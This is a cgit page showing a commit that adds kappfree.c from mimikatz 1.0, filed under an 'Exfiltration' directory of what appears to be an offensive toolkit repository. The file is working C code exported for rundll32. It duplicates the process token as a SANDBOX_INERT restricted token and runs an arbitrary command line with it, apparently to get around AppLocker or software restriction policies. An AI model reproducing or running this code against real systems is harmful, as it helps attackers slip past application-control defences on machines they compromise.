aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/mimikatz-1.0/kappfree/kappfree.c
diff options
context:
space:
mode:
Diffstat (limited to 'Exfiltration/mimikatz-1.0/kappfree/kappfree.c')
-rw-r--r--Exfiltration/mimikatz-1.0/kappfree/kappfree.c34
1 files changed, 34 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.c b/Exfiltration/mimikatz-1.0/kappfree/kappfree.c
new file mode 100644
index 0000000..63130c9
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/kappfree/kappfree.c
@@ -0,0 +1,34 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "kappfree.h"
+
+extern __declspec(dllexport) void __cdecl startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow)
+{
+ HANDLE monToken, monSuperToken;
+ wchar_t * commandLine;
+ PROCESS_INFORMATION mesInfosProcess;
+ STARTUPINFO mesInfosDemarrer;
+
+ if(OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY /*| TOKEN_IMPERSONATE*/, &monToken))
+ {
+ if(CreateRestrictedToken(monToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &monSuperToken))
+ {
+ RtlZeroMemory(&mesInfosProcess, sizeof(PROCESS_INFORMATION));
+ RtlZeroMemory(&mesInfosDemarrer, sizeof(STARTUPINFO));
+ mesInfosDemarrer.cb = sizeof(STARTUPINFO);
+
+ commandLine = _wcsdup(lpszCmdLine);
+ if(CreateProcessAsUser(monSuperToken, NULL, commandLine, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &mesInfosDemarrer, &mesInfosProcess))
+ {
+ CloseHandle(mesInfosProcess.hThread);
+ CloseHandle(mesInfosProcess.hProcess);
+ }
+ free(commandLine);
+ CloseHandle(monSuperToken);
+ }
+ CloseHandle(monToken);
+ }
+}
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-27 22:14:43 +0000